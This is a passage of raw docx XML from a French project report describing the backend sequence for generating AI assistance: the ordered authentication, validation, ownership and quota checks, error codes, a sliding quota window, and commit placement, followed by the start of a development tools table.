        </w:rPr>
        <w:t xml:space="preserve">« Générer une assistance IA »</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. C'est le plus représentatif du projet : il traverse les trois couches du backend, sollicite un système externe, met en œuvre cinq contrôles successifs, et produit l'enregistrement qui alimente à la fois l'historique et le quota.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="X99dbadda38b433f4299d68146821382b1234afe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scénario nominal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="3566394"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="seq-uc10.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="3566394"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Diagramme de séquence — générer une assistance IA, scénario nominal.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="Xde73705c2faa717c67cac7daa9ae91f0017a54b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>L'ordre des contrôles, et pourquoi il est celui-là</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La séquence exécute cinq contrôles avant d'appeler le modèle. Leur ordre n'est pas indifférent : il va</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">du moins coûteux au plus coûteux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et du plus général au plus spécifique.</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Contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Code retour en cas d'échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">①</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jeton valide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vérification de signature, sans accès base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">401</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">②</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entrées conformes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">En mémoire, aucun accès base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">③</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Document existant</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">et</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">appartenant à l'utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Une requête indexée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">④</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quota non atteint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Une agrégation indexée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">429</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">⑤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moteur d'inférence joignable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Appel réseau, jusqu'à 60 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">502</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Valider les entrées</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">avant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de toucher la base évite une requête pour une demande de toute façon malformée. Vérifier la propriété du document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">avant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le quota évite de consommer une agrégation pour un document qui n'appartient pas à l'appelant. Et l'appel au modèle, de loin le plus coûteux, n'a lieu qu'une fois tout le reste validé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux points de sécurité se lisent dans cet ordre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le contrôle de propriété est fusionné avec la lecture.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La requête ne cherche pas le document puis ne vérifie son propriétaire : elle filtre sur les deux critères à la fois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2790050" cy="688506"/>
            <wp:docPr id="31" name="Picture 31"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03bb8ca1d49c-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2790050" cy="688506"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La conséquence est volontaire : un document qui existe mais appartient à quelqu'un d'autre renvoie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Répondre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">confirmerait à l'attaquant que l'identifiant existe — c'est le même raisonnement anti-énumération que sur la route de mot de passe oublié.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le quota est compté, pas stocké.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'agrégation porte sur une fenêtre glissante de 24 heures :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5684970" cy="1089719"/>
            <wp:docPr id="32" name="Picture 32"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="5a9aa13e2aca-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5684970" cy="1089719"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une fenêtre glissante, et non un compteur remis à zéro à minuit : l'utilisateur ne peut pas consommer deux quotas en épuisant le premier à 23 h 50 puis le suivant à 00 h 10. Et comme la valeur est recalculée à chaque appel, elle ne peut pas se désynchroniser de l'historique réel.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:id="81" w:name="Xb4ff70729bacd640e1c4e63d1ade85c718995f7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scénarios alternatifs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4155868" cy="1689573"/>
            <wp:docPr id="33" name="Picture 33"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="e6364fc61b5f-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4155868" cy="1689573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cas [D] mérite un mot.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call_ollama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">traduit trois exceptions distinctes de la bibliothèque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— connexion refusée, dépassement de délai, erreur HTTP — en une seule</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RuntimeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porteuse d'un message lisible :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5636699" cy="689063"/>
            <wp:docPr id="34" name="Picture 34"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="4ed387ad3dab-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5636699" cy="689063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>C'est l'application concrète de la règle de séparation des couches (§ 5.2) : le service ne connaît pas HTTP et ne renvoie pas de code de statut, il lève une exception métier. C'est la route qui décide que cette exception vaut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">502</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— « passerelle défaillante », sémantiquement juste puisque l'API sert ici d'intermédiaire vers un service tiers. Si le moteur d'inférence changeait, seul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">serait à modifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le placement du commit est la décision la plus importante de cette séquence.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'écriture dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a lieu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">après</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>le retour du modèle, jamais avant. Un appel qui échoue ne laisse donc aucune trace et ne décompte pas de quota — l'utilisateur n'est pas puni d'une panne d'infrastructure. Le revers est assumé : une génération réussie dont la réponse HTTP se perdrait en route serait comptée sans être vue par l'utilisateur. Le cas JE-12 du jeu d'essai (§ 10) verrouille cette propriété.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0E4E8" w14:textId="5E0E5454" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00F02D2D" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Les</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> spécifications techniques du projet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Environnement de travail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'environnement est volontairement léger : aucune machine virtuelle, aucun service managé, rien qui ne puisse être réinstallé en une heure sur un autre poste.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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rôle</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Exécution du backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">venv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">intégré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Isolation des dépendances Python, par projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chaîne de construction du frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>npm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Gestionnaire de paquets ; package-lock.json commité, installation par npm ci en intégration continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Visual Studio Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur, avec Volar (Vue), Python et ESLint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Git + GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gestion de versions et dépôt distant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
